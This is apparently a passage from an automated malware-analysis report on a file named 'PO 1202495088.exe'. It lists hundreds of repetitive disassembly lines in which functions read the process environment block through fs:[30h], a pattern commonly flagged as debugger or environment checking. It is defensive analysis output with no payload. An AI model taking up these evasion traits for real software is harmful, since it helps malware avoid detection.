                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01C0 mov eax, dword ptr fs:[00000030h]4_2_013C01C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C01C0 mov eax, dword ptr fs:[00000030h]4_2_013C01C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01436040 mov eax, dword ptr fs:[00000030h]4_2_01436040
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2010 mov ecx, dword ptr fs:[00000030h]4_2_013F2010
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8009 mov eax, dword ptr fs:[00000030h]4_2_013B8009
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6074 mov eax, dword ptr fs:[00000030h]4_2_013B6074
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B6074 mov eax, dword ptr fs:[00000030h]4_2_013B6074
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0044 mov eax, dword ptr fs:[00000030h]4_2_013E0044
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F00A5 mov eax, dword ptr fs:[00000030h]4_2_013F00A5
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C0E0 mov ecx, dword ptr fs:[00000030h]4_2_0143C0E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA093 mov ecx, dword ptr fs:[00000030h]4_2_013AA093
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC090 mov eax, dword ptr fs:[00000030h]4_2_013AC090
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484080 mov eax, dword ptr fs:[00000030h]4_2_01484080
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC0F6 mov eax, dword ptr fs:[00000030h]4_2_013AC0F6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446090 mov eax, dword ptr fs:[00000030h]4_2_01446090
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014360A0 mov eax, dword ptr fs:[00000030h]4_2_014360A0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE328 mov eax, dword ptr fs:[00000030h]4_2_013AE328
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE328 mov eax, dword ptr fs:[00000030h]4_2_013AE328
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE328 mov eax, dword ptr fs:[00000030h]4_2_013AE328
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E8322 mov eax, dword ptr fs:[00000030h]4_2_013E8322
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E8322 mov eax, dword ptr fs:[00000030h]4_2_013E8322
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E8322 mov eax, dword ptr fs:[00000030h]4_2_013E8322
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E631F mov eax, dword ptr fs:[00000030h]4_2_013E631F
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE310 mov eax, dword ptr fs:[00000030h]4_2_013CE310
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE310 mov eax, dword ptr fs:[00000030h]4_2_013CE310
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE310 mov eax, dword ptr fs:[00000030h]4_2_013CE310
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E372 mov eax, dword ptr fs:[00000030h]4_2_0142E372
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E372 mov eax, dword ptr fs:[00000030h]4_2_0142E372
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E372 mov eax, dword ptr fs:[00000030h]4_2_0142E372
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E372 mov eax, dword ptr fs:[00000030h]4_2_0142E372
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430371 mov eax, dword ptr fs:[00000030h]4_2_01430371
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430371 mov eax, dword ptr fs:[00000030h]4_2_01430371
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D237A mov eax, dword ptr fs:[00000030h]4_2_013D237A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145630E mov eax, dword ptr fs:[00000030h]4_2_0145630E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE363 mov eax, dword ptr fs:[00000030h]4_2_013EE363
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464320 mov eax, dword ptr fs:[00000030h]4_2_01464320
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA350 mov eax, dword ptr fs:[00000030h]4_2_013EA350
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A8347 mov eax, dword ptr fs:[00000030h]4_2_013A8347
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A8347 mov eax, dword ptr fs:[00000030h]4_2_013A8347
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A8347 mov eax, dword ptr fs:[00000030h]4_2_013A8347
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014343D5 mov eax, dword ptr fs:[00000030h]4_2_014343D5
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E3DD mov eax, dword ptr fs:[00000030h]4_2_0143E3DD
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DA390 mov eax, dword ptr fs:[00000030h]4_2_013DA390
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DA390 mov eax, dword ptr fs:[00000030h]4_2_013DA390
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DA390 mov eax, dword ptr fs:[00000030h]4_2_013DA390
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E43D0 mov ecx, dword ptr fs:[00000030h]4_2_013E43D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B63CB mov eax, dword ptr fs:[00000030h]4_2_013B63CB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142C3B0 mov eax, dword ptr fs:[00000030h]4_2_0142C3B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE3C0 mov eax, dword ptr fs:[00000030h]4_2_013AE3C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE3C0 mov eax, dword ptr fs:[00000030h]4_2_013AE3C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AE3C0 mov eax, dword ptr fs:[00000030h]4_2_013AE3C0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC3C7 mov eax, dword ptr fs:[00000030h]4_2_013AC3C7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014543BA mov eax, dword ptr fs:[00000030h]4_2_014543BA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014543BA mov eax, dword ptr fs:[00000030h]4_2_014543BA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D0230 mov ecx, dword ptr fs:[00000030h]4_2_013D0230
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA22B mov eax, dword ptr fs:[00000030h]4_2_013EA22B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA22B mov eax, dword ptr fs:[00000030h]4_2_013EA22B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA22B mov eax, dword ptr fs:[00000030h]4_2_013EA22B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A821B mov eax, dword ptr fs:[00000030h]4_2_013A821B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AA200 mov eax, dword ptr fs:[00000030h]4_2_013AA200
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430227 mov eax, dword ptr fs:[00000030h]4_2_01430227
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430227 mov eax, dword ptr fs:[00000030h]4_2_01430227
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430227 mov eax, dword ptr fs:[00000030h]4_2_01430227
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013AC2B0 mov ecx, dword ptr fs:[00000030h]4_2_013AC2B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D42AF mov eax, dword ptr fs:[00000030h]4_2_013D42AF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D42AF mov eax, dword ptr fs:[00000030h]4_2_013D42AF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C02F9 mov eax, dword ptr fs:[00000030h]4_2_013C02F9
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E289 mov eax, dword ptr fs:[00000030h]4_2_0142E289
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BA2E0 mov eax, dword ptr fs:[00000030h]4_2_013BA2E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B82E0 mov eax, dword ptr fs:[00000030h]4_2_013B82E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013F2539 mov eax, dword ptr fs:[00000030h]4_2_013F2539
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446550 mov eax, dword ptr fs:[00000030h]4_2_01446550
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A553 mov eax, dword ptr fs:[00000030h]4_2_0147A553
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C252B mov eax, dword ptr fs:[00000030h]4_2_013C252B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC50D mov eax, dword ptr fs:[00000030h]4_2_013EC50D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC50D mov eax, dword ptr fs:[00000030h]4_2_013EC50D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE507 mov eax, dword ptr fs:[00000030h]4_2_013DE507
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B2500 mov eax, dword ptr fs:[00000030h]4_2_013B2500
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CC560 mov eax, dword ptr fs:[00000030h]4_2_013CC560
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C51D mov eax, dword ptr fs:[00000030h]4_2_0143C51D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B254C mov eax, dword ptr fs:[00000030h]4_2_013B254C
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013CE547 mov eax, dword ptr fs:[00000030h]4_2_013CE547
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E6540 mov eax, dword ptr fs:[00000030h]4_2_013E6540
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E8540 mov eax, dword ptr fs:[00000030h]4_2_013E8540
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014305C6 mov eax, dword ptr fs:[00000030h]4_2_014305C6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B45B0 mov eax, dword ptr fs:[00000030h]4_2_013B45B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B45B0 mov eax, dword ptr fs:[00000030h]4_2_013B45B0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145E5E0 mov eax, dword ptr fs:[00000030h]4_2_0145E5E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E2594 mov eax, dword ptr fs:[00000030h]4_2_013E2594
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA580 mov eax, dword ptr fs:[00000030h]4_2_013EA580
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA580 mov eax, dword ptr fs:[00000030h]4_2_013EA580
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C5FC mov eax, dword ptr fs:[00000030h]4_2_0143C5FC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E588 mov eax, dword ptr fs:[00000030h]4_2_0142E588
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E588 mov eax, dword ptr fs:[00000030h]4_2_0142E588
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C592 mov eax, dword ptr fs:[00000030h]4_2_0143C592
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA5E7 mov ebx, dword ptr fs:[00000030h]4_2_013EA5E7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA5E7 mov eax, dword ptr fs:[00000030h]4_2_013EA5E7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014385AA mov eax, dword ptr fs:[00000030h]4_2_014385AA
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E65D0 mov eax, dword ptr fs:[00000030h]4_2_013E65D0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EC5C6 mov eax, dword ptr fs:[00000030h]4_2_013EC5C6
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430443 mov eax, dword ptr fs:[00000030h]4_2_01430443
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E461 mov eax, dword ptr fs:[00000030h]4_2_0143E461
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0147A464 mov eax, dword ptr fs:[00000030h]4_2_0147A464
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013A640D mov eax, dword ptr fs:[00000030h]4_2_013A640D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446400 mov eax, dword ptr fs:[00000030h]4_2_01446400
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01446400 mov eax, dword ptr fs:[00000030h]4_2_01446400
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8470 mov eax, dword ptr fs:[00000030h]4_2_013B8470
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B8470 mov eax, dword ptr fs:[00000030h]4_2_013B8470
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE45E mov eax, dword ptr fs:[00000030h]4_2_013DE45E
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0445 mov eax, dword ptr fs:[00000030h]4_2_013C0445
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE4BC mov eax, dword ptr fs:[00000030h]4_2_013EE4BC
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E44A8 mov eax, dword ptr fs:[00000030h]4_2_013E44A8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B24A2 mov eax, dword ptr fs:[00000030h]4_2_013B24A2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B24A2 mov ecx, dword ptr fs:[00000030h]4_2_013B24A2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E4F2 mov eax, dword ptr fs:[00000030h]4_2_0143E4F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143E4F2 mov eax, dword ptr fs:[00000030h]4_2_0143E4F2
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E648A mov eax, dword ptr fs:[00000030h]4_2_013E648A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E648A mov eax, dword ptr fs:[00000030h]4_2_013E648A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E648A mov eax, dword ptr fs:[00000030h]4_2_013E648A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014544F8 mov eax, dword ptr fs:[00000030h]4_2_014544F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014544F8 mov eax, dword ptr fs:[00000030h]4_2_014544F8
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0485 mov ecx, dword ptr fs:[00000030h]4_2_013B0485
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B64F0 mov eax, dword ptr fs:[00000030h]4_2_013B64F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA4F0 mov eax, dword ptr fs:[00000030h]4_2_013EA4F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA4F0 mov eax, dword ptr fs:[00000030h]4_2_013EA4F0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE4EF mov eax, dword ptr fs:[00000030h]4_2_013EE4EF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EE4EF mov eax, dword ptr fs:[00000030h]4_2_013EE4EF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143C490 mov eax, dword ptr fs:[00000030h]4_2_0143C490
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D44D1 mov eax, dword ptr fs:[00000030h]4_2_013D44D1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D44D1 mov eax, dword ptr fs:[00000030h]4_2_013D44D1
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_014484BB mov eax, dword ptr fs:[00000030h]4_2_014484BB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0145E750 mov eax, dword ptr fs:[00000030h]4_2_0145E750
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B471B mov eax, dword ptr fs:[00000030h]4_2_013B471B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B471B mov eax, dword ptr fs:[00000030h]4_2_013B471B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D270D mov eax, dword ptr fs:[00000030h]4_2_013D270D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D270D mov eax, dword ptr fs:[00000030h]4_2_013D270D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D270D mov eax, dword ptr fs:[00000030h]4_2_013D270D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4779 mov eax, dword ptr fs:[00000030h]4_2_013B4779
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B4779 mov eax, dword ptr fs:[00000030h]4_2_013B4779
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E0774 mov eax, dword ptr fs:[00000030h]4_2_013E0774
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C2760 mov ecx, dword ptr fs:[00000030h]4_2_013C2760
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov ecx, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D2755 mov eax, dword ptr fs:[00000030h]4_2_013D2755
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013EA750 mov eax, dword ptr fs:[00000030h]4_2_013EA750
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464730 mov eax, dword ptr fs:[00000030h]4_2_01464730
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464730 mov eax, dword ptr fs:[00000030h]4_2_01464730
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B07A7 mov eax, dword ptr fs:[00000030h]4_2_013B07A7
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DE7E0 mov eax, dword ptr fs:[00000030h]4_2_013DE7E0
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142E79D mov eax, dword ptr fs:[00000030h]4_2_0142E79D
